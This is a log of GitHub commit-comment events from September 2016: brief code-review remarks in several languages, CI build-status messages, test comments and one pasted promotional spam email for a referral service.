{"id":"4607242190","type":"CommitCommentEvent","actor":{"login":"dannyvankooten"},"repo":{"name":"ibericode/mc4wp-snippets"},"payload":{"comment":{"id":19142745,"position":null,"line":null,"path":null,"commit_id":"4ab729358f9b37ff88fcf4c644c9084678c3596c","created_at":"2016-09-23T08:30:17Z","updated_at":"2016-09-23T08:30:17Z","body":"👌 👍 "}},"created_at":"2016-09-23T08:30:17Z"}
{"id":"4607244773","type":"CommitCommentEvent","actor":{"login":"ChristelLicuanan"},"repo":{"name":"MobileComputingClass/FirstAndroidApp_Morning"},"payload":{"comment":{"id":19142752,"position":null,"line":null,"path":null,"commit_id":"d8ea24559db4cc8f13b472ed21f7a43dadc679c9","created_at":"2016-09-23T08:30:52Z","updated_at":"2016-09-23T08:30:52Z","body":"@manalilib sir pacheck po :)"}},"created_at":"2016-09-23T08:30:52Z"}
{"id":"4607245099","type":"CommitCommentEvent","actor":{"login":"mraspaud"},"repo":{"name":"khunger/trollduction"},"payload":{"comment":{"id":19142754,"position":13,"line":1269,"path":"trollduction/producer.py","commit_id":"883a536a42853d78382131a9745101ba2b0954e9","created_at":"2016-09-23T08:30:57Z","updated_at":"2016-09-23T08:30:57Z","body":"ok, good"}},"created_at":"2016-09-23T08:30:57Z"}
{"id":"4607247340","type":"CommitCommentEvent","actor":{"login":"kisliakovsky"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19142759,"position":27,"line":27,"path":"monitor/src/main/java/com/emc/mongoose/monitor/impl/FsDriverFactory.java","commit_id":"f3aa1c8073099f203a6c69d8500743e71317fbc8","created_at":"2016-09-23T08:31:26Z","updated_at":"2016-09-23T08:31:26Z","body":"Home pc has broken idea formatting settings. Sorry. I'll fix it. Thanx!"}},"created_at":"2016-09-23T08:31:26Z"}
{"id":"4607247417","type":"CommitCommentEvent","actor":{"login":"MrFrangipane"},"repo":{"name":"MrFrangipane/initiation-python"},"payload":{"comment":{"id":19142760,"position":14,"line":86,"path":"3ds-max.md","commit_id":"8a18c2d8b6726402f70428e2adc1f96c4ef968dd","created_at":"2016-09-23T08:31:27Z","updated_at":"2016-09-23T08:31:27Z","body":"Test de commentaire"}},"created_at":"2016-09-23T08:31:27Z"}
{"id":"4607249095","type":"CommitCommentEvent","actor":{"login":"SeanXiao1207"},"repo":{"name":"Anson365/framework"},"payload":{"comment":{"id":19142766,"position":null,"line":null,"path":null,"commit_id":"d04cb785d23d3948f226a59970be560050d8b97d","created_at":"2016-09-23T08:31:52Z","updated_at":"2016-09-23T08:31:52Z","body":"为什么要替换redis?\r\n"}},"created_at":"2016-09-23T08:31:52Z"}
{"id":"4607249493","type":"CommitCommentEvent","actor":{"login":"ridelore"},"repo":{"name":"ridelore/sopel-modules"},"payload":{"comment":{"id":19142771,"position":null,"line":null,"path":null,"commit_id":"ec54fa7915f90521c2e9e456695aec733f641d42","created_at":"2016-09-23T08:31:57Z","updated_at":"2016-09-23T08:31:57Z","body":"YOU WILL CRUMBLE UNDER FEAR AND PRESSURE"}},"created_at":"2016-09-23T08:31:57Z"}
{"id":"4607256863","type":"CommitCommentEvent","actor":{"login":"zhuzheng314"},"repo":{"name":"liusaint/zhihu-answers"},"payload":{"comment":{"id":19142786,"position":null,"line":null,"path":null,"commit_id":"02c892cdbaacd88c35f4ae3588619fe5fb278860","created_at":"2016-09-23T08:33:39Z","updated_at":"2016-09-23T08:33:39Z","body":"perfact"}},"created_at":"2016-09-23T08:33:39Z"}
{"id":"4607264976","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19142797,"position":null,"line":null,"path":null,"commit_id":"fa5b312f495e4eeec28758c0980519fc3187d6e6","created_at":"2016-09-23T08:35:30Z","updated_at":"2016-09-23T08:35:30Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1132](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14034&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-23T08:35:30Z"}
{"id":"4607268504","type":"CommitCommentEvent","actor":{"login":"ch-k"},"repo":{"name":"khunger/mpop"},"payload":{"comment":{"id":19142804,"position":13,"line":406,"path":"mpop/imageo/formats/ninjotiff.py","commit_id":"3f0bee69b88ffed4db48447e712cc6e776796e1c","created_at":"2016-09-23T08:36:18Z","updated_at":"2016-09-23T08:36:18Z","body":"I've switched the parameter order. Thank's for reviewing!"}},"created_at":"2016-09-23T08:36:18Z"}
{"id":"4607269414","type":"CommitCommentEvent","actor":{"login":"zhangxinxu"},"repo":{"name":"yued-fe/bobo"},"payload":{"comment":{"id":19142807,"position":null,"line":null,"path":null,"commit_id":"fd2d463e86ec9c4f875f0e9894c2adaa20b47c8d","created_at":"2016-09-23T08:36:31Z","updated_at":"2016-09-23T08:36:31Z","body":"merge"}},"created_at":"2016-09-23T08:36:31Z"}
{"id":"4607287895","type":"CommitCommentEvent","actor":{"login":"alexlib"},"repo":{"name":"OpenPTV/openptv-python"},"payload":{"comment":{"id":19142841,"position":88,"line":479,"path":"src_c/jw_ptv.c","commit_id":"22e95968ae0c1c2075cbba6e8bd51655c7a31d7e","created_at":"2016-09-23T08:40:48Z","updated_at":"2016-09-23T08:40:48Z","body":"jw_ptv.c sends frame = 0 during pre-processing run, it has to be recognized by the write_targets"}},"created_at":"2016-09-23T08:40:48Z"}
{"id":"4607295079","type":"CommitCommentEvent","actor":{"login":"pkuczynski"},"repo":{"name":"railsconfig/config"},"payload":{"comment":{"id":19142858,"position":6,"line":5,"path":"CHANGELOG.md","commit_id":"80b2e7bf28fed14f0c33b1609af1dd7166313341","created_at":"2016-09-23T08:42:28Z","updated_at":"2016-09-23T08:42:28Z","body":"Of course! My bad. I will fix it straight away..."}},"created_at":"2016-09-23T08:42:28Z"}
{"id":"4607295506","type":"CommitCommentEvent","actor":{"login":"KingsDevelopment"},"repo":{"name":"cstefanache/angular2-img-cropper"},"payload":{"comment":{"id":19142860,"position":null,"line":null,"path":null,"commit_id":"d9d33299b90c74c55d051eecfe52ef8d240c0c82","created_at":"2016-09-23T08:42:35Z","updated_at":"2016-09-23T08:42:35Z","body":"Did you test this?\r\nDoesn't look like it's going to work this way.\r\n\r\nMainly because `AppModule` is taken by a lot of people probably.\r\nOh and because the index.ts still exports the things you won't need in v2.0.0"}},"created_at":"2016-09-23T08:42:35Z"}
{"id":"4607305567","type":"CommitCommentEvent","actor":{"login":"ksmpy"},"repo":{"name":"urigit/learnGitBranching"},"payload":{"comment":{"id":19142877,"position":14,"line":114,"path":"grunt.js","commit_id":"b9a067d4d783bb9a32c0b0a9f7346464e6a33c6d","created_at":"2016-09-23T08:44:52Z","updated_at":"2016-09-23T08:44:52Z","body":"테스트 주석"}},"created_at":"2016-09-23T08:44:52Z"}
{"id":"4607307040","type":"CommitCommentEvent","actor":{"login":"ksmpy"},"repo":{"name":"urigit/learnGitBranching"},"payload":{"comment":{"id":19142879,"position":22,"line":174,"path":"grunt.js","commit_id":"b9a067d4d783bb9a32c0b0a9f7346464e6a33c6d","created_at":"2016-09-23T08:45:12Z","updated_at":"2016-09-23T08:45:12Z","body":"되는지 테스트 하기"}},"created_at":"2016-09-23T08:45:12Z"}
{"id":"4607313141","type":"CommitCommentEvent","actor":{"login":"TingYiShun"},"repo":{"name":"derf/feh"},"payload":{"comment":{"id":19142893,"position":null,"line":null,"path":null,"commit_id":"fa727bc857901a5c7b921e681c3ce1dbd5a26377","created_at":"2016-09-23T08:46:36Z","updated_at":"2016-09-23T08:46:36Z","body":"I also read about this script:\r\n## Copyright © 2010 by Daniel Friesel <derf@derf.homelinux.org>\r\n +## Copyright © 2010 by Daniel Friesel <derf@finalrewind.org>"}},"created_at":"2016-09-23T08:46:36Z"}
{"id":"4607314343","type":"CommitCommentEvent","actor":{"login":"AnthonyMDev"},"repo":{"name":"AnthonyMDev/BRYXBanner"},"payload":{"comment":{"id":19142897,"position":37,"line":137,"path":"Pod/Classes/Banner.swift","commit_id":"b0de4a92b520e48fea216ca9004bbbec61ac0522","created_at":"2016-09-23T08:46:52Z","updated_at":"2016-09-23T08:46:52Z","body":"#outlook a {\n\npadding: 0;\n}\n.ReadMsgBody {\n\nwidth: 100%;\n}\n.ExternalClass {\n\nwidth: 100%;\n}\n.ExternalClass, .ExternalClass p, .ExternalClass span, .ExternalClass font, .ExternalClass td, .ExternalClass div {\n\nline-height: 100%;\n}\nbody, table, td, a {\n\n-webkit-text-size-adjust: 100%;\n\n-ms-text-size-adjust: 100%;\n}\ntable, td {\n\nmso-table-lspace: 0pt;\n\nmso-table-rspace: 0pt;\n}\nimg {\n\n-ms-interpolation-mode: bicubic;\n}\n\nbody {\n\nmargin: 0;\n\npadding: 0;\n\n}\nimg {\n\nborder: 0;\n\nheight: auto;\n\nline-height: 100%;\n\noutline: none;\n\ntext-decoration: none;\n}\ntable {\n\nborder-collapse: collapse !important;\n}\nbody {\n\nheight: 100% !important;\n\nmargin: 0;\n\npadding: 0;\n\nwidth: 100% !important;\n}\n\nappleBody a {\n\ncolor: #68440a;\n\ntext-decoration: none;\n}\n.appleFooter a {\n\ncolor: #999999;\n\ntext-decoration: none;\n}\n.faq {\n\nline-height: 18px;\n\nlist-style: outside none none;\n\nmargin: 10px 0;\n\npadding: 0;\n}\n.mobile-only {\n\ndisplay: none;\n}\n\n@media screen and (max-width: 525px) {\n\ntable[class=\"wrapper\"] {\n\nwidth: 100% !important;\n}\n\ntd[class=\"logo\"] {\n\ntext-align: left;\n\npadding: 20px 0 20px 0 !important;\n}\ntd[class=\"logo\"] img {\n\nmargin: 0 auto!important;\n}\n\n[class=\"mobile-only\"] {\n\ndisplay: block;\n}\n\nbr[class=\"mobile-hide\"] {\n\ndisplay: none;\n}\ntd[class=\"mobile-hide\"] {\n\ndisplay: none;\n}\nimg[class=\"mobile-hide\"] {\n\ndisplay: none !important;\n}\nimg[class=\"img-max\"] {\n\nmax-width: 100% !important;\n\nwidth: 100% !important;\n\nheight: auto !important;\n}\n\nimg[class=\"img-min\"] {\n\nmax-width: 73px !important;\n\nwidth: 73px !important;\n\nheight: auto !important;\n\npadding-top: 8px !important;\n}\n\nimg[class=\"img-apps\"] {\n\nmax-width: 46% !important;\n\nwidth: 46% !important;\n\nheight: auto !important;\n}\nimg[class=\"img-max-profile\"] {\n\nmax-width: 50% !important;\n\nwidth: 50% !important;\n\nheight: auto !important;\n\nborder-radius: 200px;\n}\n\ntable[class=\"responsive-table\"] {\n\nwidth: 100%!important;\n}\n\ntd[class=\"padding\"] {\n\npadding: 10px 5% 15px 5% !important;\n}\ntd[class=\"amount\"] {\n\nfont-size: 10px!important;\n}\ntd[class=\"mobile-text-twelve\"] {\n\nfont-size: 12px!important;\n}\nspan[class=\"mobile-text-twelve\"] {\n\nfont-size: 14px!important;\n}\ntd[class=\"padding-copy\"] {\n\npadding: 10px 5% 10px 5% !important;\n\ntext-align: center;\n}\ntd[class=\"padding-meta\"] {\n\npadding: 30px 5% 0px 5% !important;\n\ntext-align: center;\n}\ntd[class=\"no-pad\"] {\n\npadding: 0 0 20px 0 !important;\n}\ntd[class=\"no-pad-bottom\"] {\n\npadding: 25px 0 0 0 !important;\n}\ntd[class=\"no-padding\"] {\n\npadding: 0 !important;\n}\ntd[class=\"section-padding\"] {\n\npadding: 25px 15px 25px 15px !important;\n}\ntd[class=\"section-no-padding-bottom\"] {\n\npadding: 25px 15px 0 15px !important;\n}\n\ntd[class=\"section-no-padding-top\"] {\n\npadding: 0 5% 25px 5% !important;\n}\n\ntd[class=\"section-no-padding-top-bottom\"] {\n\npadding: 0 5% 0 5% !important;\n}\ntd[class=\"section-padding-bottom-image\"] {\n\npadding: 50px 15px 0 15px !important;\n}\n\ntd[class=\"mobile-wrapper\"] {\n\npadding: 10px 5% 15px 5% !important;\n}\ntable[class=\"mobile-button-container\"] {\n\nmargin: 0 auto;\n\nwidth: 100% !important;\n}\na[class=\"mobile-button\"] {\n\nwidth: 80% !important;\n\npadding: 15px !important;\n\nborder: 0 !important;\n\nfont-size: 16px !important;\n}\n}\n\nanthony.miller.csn@gmail.com sent you $20 to try the all-new empowr:\n\nReceive your $20 &#9658;\n\nResources:\n\nWhat is empowr?\nWho's behind it?\nSee who you know that's on empowr\n\nNo more emails from anthony.miller.csn@gmail.com (anthony.miller.csn@gmail.com)? Unsubscribe\nhttp://profile.empowr.com/ApplicationManager/CommunityEmailSettings.aspx?em=K%2FzdUVCDppRybzAPzsRVnb09WcfocFNVzAotQYaRvebvNJtL8Pi2tdfFP8Nx4TBKt%2BpzVV6SrFbS71JGWnGIPGqh22irFPtkfWe4dwuRQFCYJozoZynyd2KcIHic9F5JcVSJEFZzTPzmccxHruEJGD4vgrCrACZu&vet=694&mlid=8998745057&fn=QpLpyL23t7HpRXkzIHngtg%3D%3D\n\n*This offer has been sent by anthony.miller.csn@gmail.com. By accepting this offer to try the new empowr, I stipulate that I'm 18 or older and am signing up having agreed with the product, terms and privacy policies, including the manner in which \"$\" and the word \"earnings\" are used throughout the empowr website, mobile apps and all empowr communications including this email, as defined in the product policy. This promotional email was sent to reply@reply.github.com and may contain special notices or offers. It is for illustrative purposes only and is in no way a guarantee. You can prevent future emails here. empowr - 501 West Broadway, Suite A182, San Diego, CA 92101, USA."}},"created_at":"2016-09-23T08:46:52Z"}
{"id":"4607318173","type":"CommitCommentEvent","actor":{"login":"sketchtimmy"},"repo":{"name":"sketchtimmy/Android-5.1-x86-rootfs"},"payload":{"comment":{"id":19142911,"position":null,"line":null,"path":null,"commit_id":"6d5e73d0f2a206a579aad2783ba53ce433d67eb6","created_at":"2016-09-23T08:47:45Z","updated_at":"2016-09-23T08:47:45Z","body":"git clone https://chromium.googlesource.com/All-Projects"}},"created_at":"2016-09-23T08:47:45Z"}
{"id":"4607318734","type":"CommitCommentEvent","actor":{"login":"gitslagga"},"repo":{"name":"aceat64/EasyBitcoin-PHP"},"payload":{"comment":{"id":19142913,"position":null,"line":null,"path":null,"commit_id":"01f85d99092a40dcbda2d6f697279adbe049e11a","created_at":"2016-09-23T08:47:51Z","updated_at":"2016-09-23T08:47:51Z","body":"更改后，速度快多啦！ 大赞！"}},"created_at":"2016-09-23T08:47:51Z"}
{"id":"4607320936","type":"CommitCommentEvent","actor":{"login":"TingYiShun"},"repo":{"name":"derf/feh"},"payload":{"comment":{"id":19142917,"position":null,"line":null,"path":null,"commit_id":"fa727bc857901a5c7b921e681c3ce1dbd5a26377","created_at":"2016-09-23T08:48:22Z","updated_at":"2016-09-23T08:48:22Z","body":"I also read about this script: \r\n\r\nCopyright © 2010 by Daniel Friesel derf@derf.homelinux.org"}},"created_at":"2016-09-23T08:48:22Z"}
{"id":"4607324424","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19142922,"position":18,"line":314,"path":"ryu/lib/stplib.py","commit_id":"0fbbfda834cf742a9aa3650a8b3609ee8bc21fc8","created_at":"2016-09-23T08:49:06Z","updated_at":"2016-09-23T08:49:06Z","body":"「その旨をコメントに追記します」\r\nとは具体的にどういう意味でしょうか？\r\n「ポートが追加・削除になった場合には、\r\nその情報を〜」\r\nなど、実装についての説明をコメントに入れる、\r\nという意味でしょうか？\r\n\r\nまた、ポートの削除ルートは通せない、\r\nとのことですが、通せますよ？\r\nMininet の使い方というよりは、\r\nOVS の使い方になりますが。\r\n\r\nstplib の試験ファイルについては、\r\nなぜ存在しないのかは、さすがに知りません、、、\r\n初版を作成した人物ではないので、、、\r\n作ろうと思えば、Mininet 抜きでも、\r\n作れると思いますが、ただ単にやってない、\r\n動かして確認した、というだけかと思います。"}},"created_at":"2016-09-23T08:49:06Z"}
{"id":"4607326352","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19142927,"position":null,"line":null,"path":null,"commit_id":"fa5b312f495e4eeec28758c0980519fc3187d6e6","created_at":"2016-09-23T08:49:32Z","updated_at":"2016-09-23T08:49:32Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1132](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14034&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:14:02"}},"created_at":"2016-09-23T08:49:32Z"}
{"id":"4607328861","type":"CommitCommentEvent","actor":{"login":"tanhanliang"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":19142937,"position":null,"line":null,"path":null,"commit_id":"2944b6f92dca913a9c6bded35ed277bff65a3601","created_at":"2016-09-23T08:50:10Z","updated_at":"2016-09-23T08:50:10Z","body":"I modified the attribute accessor to:\r\n```\r\n    public function getCollegeNameAttribute() {\r\n        if (isset($this->college)) {\r\n            return $this->college->name;\r\n        } else {\r\n            return $this->college;\r\n        }\r\n    }\r\n```\r\nIt returns ```$this->college``` instead of null which I printed to the signup form. The college value on the form is correct. \r\nThen I decided that it wasn't really necessary to remind the user of his own college/course/name so I removed it. Just wondering why this behavior results."}},"created_at":"2016-09-23T08:50:10Z"}
{"id":"4607337852","type":"CommitCommentEvent","actor":{"login":"viciious"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":19142957,"position":19,"line":175,"path":"lib/mapObjects/CRewardableObject.cpp","commit_id":"bb05db90e53183bd67524ca54d5c317e1f5aa4fb","created_at":"2016-09-23T08:52:09Z","updated_at":"2016-09-23T08:52:09Z","body":"I know I'm an outsider here but these .size() == 0 checks in VCMI source code still give me creeps :)"}},"created_at":"2016-09-23T08:52:09Z"}
{"id":"4607339126","type":"CommitCommentEvent","actor":{"login":"plasmadancom"},"repo":{"name":"plasmadancom/Raspberry-Pi-Relay-APA102-LED-Controller"},"payload":{"comment":{"id":19142958,"position":null,"line":null,"path":null,"commit_id":"ab4e055d8d58412bd6336b527d6bc24b3469031a","created_at":"2016-09-23T08:52:27Z","updated_at":"2016-09-23T08:52:27Z","body":"Old version, without separate config."}},"created_at":"2016-09-23T08:52:27Z"}
{"id":"4607340021","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19142961,"position":null,"line":null,"path":null,"commit_id":"82fa685edaf173d54a2bd5da1a9c810898741df1","created_at":"2016-09-23T08:52:40Z","updated_at":"2016-09-23T08:52:40Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1133](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14045&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-23T08:52:40Z"}
{"id":"4607343883","type":"CommitCommentEvent","actor":{"login":"plasmadancom"},"repo":{"name":"plasmadancom/Raspberry-Pi-Relay-APA102-LED-Controller"},"payload":{"comment":{"id":19142971,"position":null,"line":null,"path":null,"commit_id":"a43b08a7226770ea3a2bb6270db875b3d3ab267a","created_at":"2016-09-23T08:53:34Z","updated_at":"2016-09-23T08:53:34Z","body":"Old version. Replaced by ```/python/preset.py```"}},"created_at":"2016-09-23T08:53:34Z"}
{"id":"4607350301","type":"CommitCommentEvent","actor":{"login":"lunaryorn"},"repo":{"name":"caldwell/build-emacs"},"payload":{"comment":{"id":19142984,"position":null,"line":null,"path":null,"commit_id":"a9efde89eecebeb5383328854763101a626fecb3","created_at":"2016-09-23T08:55:02Z","updated_at":"2016-09-23T08:55:02Z","body":"❤️ 👍 "}},"created_at":"2016-09-23T08:55:02Z"}
{"id":"4607350338","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19142985,"position":null,"line":null,"path":null,"commit_id":"82fa685edaf173d54a2bd5da1a9c810898741df1","created_at":"2016-09-23T08:55:02Z","updated_at":"2016-09-23T08:55:02Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1133](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14045&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Compilation error: Scala compiler (new) Build time: 00:02:22"}},"created_at":"2016-09-23T08:55:02Z"}
{"id":"4607355814","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19142999,"position":null,"line":null,"path":null,"commit_id":"0eb8b92064db014100d6ed2b618c8cf635b37c26","created_at":"2016-09-23T08:56:17Z","updated_at":"2016-09-23T08:56:17Z","body":"We can move the fromb initialization inside the min_attacker() for KING to avoid the line 1047.\r\nAlso, isn't piece_on(lsb(fromb)) equal to nextVictim by definition?"}},"created_at":"2016-09-23T08:56:17Z"}
{"id":"4607361578","type":"CommitCommentEvent","actor":{"login":"MartineDeVos"},"repo":{"name":"MartineDeVos/Spreadsheets"},"payload":{"comment":{"id":19143018,"position":null,"line":null,"path":null,"commit_id":"b8cf090435e3d32d3a96d990d52964e882f40f72","created_at":"2016-09-23T08:57:37Z","updated_at":"2016-09-23T08:57:37Z","body":"NB for LiteratureSpreadsheets.ods: the color markup of the blocks is for our own convenience and not recognized by the automatic annotation"}},"created_at":"2016-09-23T08:57:37Z"}
{"id":"4607362839","type":"CommitCommentEvent","actor":{"login":"SHWETAHIRE"},"repo":{"name":"SHWETAHIRE/foss"},"payload":{"comment":{"id":19143024,"position":null,"line":null,"path":null,"commit_id":"fef0128e4ea6ee379654925198d3e244b867029e","created_at":"2016-09-23T08:57:52Z","updated_at":"2016-09-23T08:57:52Z","body":"eer"}},"created_at":"2016-09-23T08:57:52Z"}
{"id":"4607364331","type":"CommitCommentEvent","actor":{"login":"bukowskiadam"},"repo":{"name":"Telaxus/EPESI"},"payload":{"comment":{"id":19143025,"position":108,"line":157,"path":"modules/Utils/QueryBuilder/QueryBuilder_0.php","commit_id":"954e193381162b929844c99316881d0ec9921adb","created_at":"2016-09-23T08:58:12Z","updated_at":"2016-09-23T08:58:12Z","body":"Sure. I've added a little method in aab138ecf46ab6e2f8ecff7731f488e2f8c8f031\r\n```\r\n$el = $f->getElement('crits');\r\n$json = $el->getValueInJson();\r\n```\r\nregards,\r\nAdam"}},"created_at":"2016-09-23T08:58:12Z"}
{"id":"4607367853","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19143028,"position":null,"line":null,"path":null,"commit_id":"4d6d84015167863c04b205d12c16720ca1e00a89","created_at":"2016-09-23T08:58:57Z","updated_at":"2016-09-23T08:58:57Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1134](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14052&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-23T08:58:57Z"}
{"id":"4607368633","type":"CommitCommentEvent","actor":{"login":"hudson6666"},"repo":{"name":"hudson6666/DS"},"payload":{"comment":{"id":19143032,"position":12,"line":16,"path":"List/list.h","commit_id":"db516bf6b3b8f13d9d17d6ec45cc278838eb70c9","created_at":"2016-09-23T08:59:08Z","updated_at":"2016-09-23T08:59:08Z","body":"模板友元函数的定义必须在友元声明之前"}},"created_at":"2016-09-23T08:59:08Z"}
{"id":"4607372358","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19143047,"position":null,"line":null,"path":null,"commit_id":"47171cff168251876ed832c8c1ce20e8d07dd5d3","created_at":"2016-09-23T08:59:58Z","updated_at":"2016-09-23T08:59:58Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35955/testReport/) for this commit**"}},"created_at":"2016-09-23T08:59:58Z"}
{"id":"4607372787","type":"CommitCommentEvent","actor":{"login":"zeffii"},"repo":{"name":"nortikin/sverchok"},"payload":{"comment":{"id":19143051,"position":16,"line":427,"path":"utils/sv_IO_panel_tools.py","commit_id":"84db7392d70c885f8be48fb482b0380bec774be5","created_at":"2016-09-23T09:00:03Z","updated_at":"2016-09-23T09:00:03Z","body":"yes @procedural quite possibly."}},"created_at":"2016-09-23T09:00:03Z"}
{"id":"4607374376","type":"CommitCommentEvent","actor":{"login":"martin93153"},"repo":{"name":"mskrip/test_repo"},"payload":{"comment":{"id":19143055,"position":null,"line":null,"path":null,"commit_id":"fa53a18229e76ec8b7912f1beeeab239515d00d0","created_at":"2016-09-23T09:00:22Z","updated_at":"2016-09-23T09:00:22Z","body":"nechavam komentar"}},"created_at":"2016-09-23T09:00:22Z"}
{"id":"4607374802","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":19143057,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-23T09:00:28Z","updated_at":"2016-09-23T09:00:28Z","body":"![Szeptember 23. - Péntek](http://ujlipot.vakvarju.com/data/napimenu/24.jpg?v=1474380669)\nTárkonyos csirkeraguleves\r\nPenne Arrabbiata\r\nCsokoládémousse"}},"created_at":"2016-09-23T09:00:28Z"}
{"id":"4607375587","type":"CommitCommentEvent","actor":{"login":"mskrip"},"repo":{"name":"mskrip/test_repo"},"payload":{"comment":{"id":19143060,"position":null,"line":null,"path":null,"commit_id":"fa53a18229e76ec8b7912f1beeeab239515d00d0","created_at":"2016-09-23T09:00:38Z","updated_at":"2016-09-23T09:00:38Z","body":"magnificent! truly inspiring work!"}},"created_at":"2016-09-23T09:00:38Z"}
{"id":"4607376013","type":"CommitCommentEvent","actor":{"login":"hudson6666"},"repo":{"name":"hudson6666/DS"},"payload":{"comment":{"id":19143061,"position":4,"line":4,"path":"Stack/stack.cpp","commit_id":"c91581d794c4a96dc4bc6b4a867e0bac1d8fd8bb","created_at":"2016-09-23T09:00:42Z","updated_at":"2016-09-23T09:00:42Z","body":"派生模板类使用基类成员函数要加 this->"}},"created_at":"2016-09-23T09:00:42Z"}
{"id":"4607380198","type":"CommitCommentEvent","actor":{"login":"hudak52"},"repo":{"name":"mskrip/test_repo"},"payload":{"comment":{"id":19143070,"position":null,"line":null,"path":null,"commit_id":"fa53a18229e76ec8b7912f1beeeab239515d00d0","created_at":"2016-09-23T09:01:38Z","updated_at":"2016-09-23T09:01:38Z","body":"fsdsdf"}},"created_at":"2016-09-23T09:01:38Z"}
{"id":"4607381964","type":"CommitCommentEvent","actor":{"login":"khurshid-alam"},"repo":{"name":"numixproject/numix-gtk-theme"},"payload":{"comment":{"id":19143073,"position":35,"line":31,"path":"scripts/utils.sh","commit_id":"f8c7f0c8a7eb71ca00aea2aa08536eae1715d02d","created_at":"2016-09-23T09:02:01Z","updated_at":"2016-09-23T09:02:01Z","body":"@lots0logs Same here. `ln -srf` overwrites even if the link exists."}},"created_at":"2016-09-23T09:02:01Z"}
{"id":"4607382380","type":"CommitCommentEvent","actor":{"login":"khurshid-alam"},"repo":{"name":"numixproject/numix-gtk-theme"},"payload":{"comment":{"id":19143077,"position":14,"line":19,"path":"scripts/utils.sh","commit_id":"f8c7f0c8a7eb71ca00aea2aa08536eae1715d02d","created_at":"2016-09-23T09:02:07Z","updated_at":"2016-09-23T09:02:07Z","body":"@lots0logs `mkdir -p` would be better as it would allow anyone compile locally multiple times without getting error."}},"created_at":"2016-09-23T09:02:07Z"}
{"id":"4607384592","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19143089,"position":null,"line":null,"path":null,"commit_id":"0eb8b92064db014100d6ed2b618c8cf635b37c26","created_at":"2016-09-23T09:02:36Z","updated_at":"2016-09-23T09:02:36Z","body":"@snicolet 2 points for you, well observed! I very appreciate your valuable remarks!"}},"created_at":"2016-09-23T09:02:36Z"}
{"id":"4607387988","type":"CommitCommentEvent","actor":{"login":"EdmondFrank"},"repo":{"name":"EdmondFrank/Esurfing"},"payload":{"comment":{"id":19143094,"position":null,"line":null,"path":null,"commit_id":"7b9eb13f361b83f23a354ca43e0867abad19b24d","created_at":"2016-09-23T09:03:25Z","updated_at":"2016-09-23T09:03:25Z","body":"@Beloya 噢，谢谢提醒了，由于太长时间没用官方客户端了，对于新版本的事情，我不太清楚。新版本的分析我考虑在国庆期间进行。"}},"created_at":"2016-09-23T09:03:25Z"}
{"id":"4607392573","type":"CommitCommentEvent","actor":{"login":"EdmondFrank"},"repo":{"name":"EdmondFrank/Esurfing"},"payload":{"comment":{"id":19143108,"position":null,"line":null,"path":null,"commit_id":"7b9eb13f361b83f23a354ca43e0867abad19b24d","created_at":"2016-09-23T09:04:26Z","updated_at":"2016-09-23T09:04:26Z","body":"@learnpace 邮件已回 :D"}},"created_at":"2016-09-23T09:04:26Z"}
{"id":"4607397368","type":"CommitCommentEvent","actor":{"login":"No1KnowMe"},"repo":{"name":"xfunforx/XglyphController"},"payload":{"comment":{"id":19143118,"position":null,"line":null,"path":null,"commit_id":"ba4cccfe0c4a46764323bee889a8f970885ab184","created_at":"2016-09-23T09:05:31Z","updated_at":"2016-09-23T09:05:31Z","body":"Man , every time I click the start bottom nothing appare , I try in one iPhone 5s & iPad Air 2"}},"created_at":"2016-09-23T09:05:31Z"}
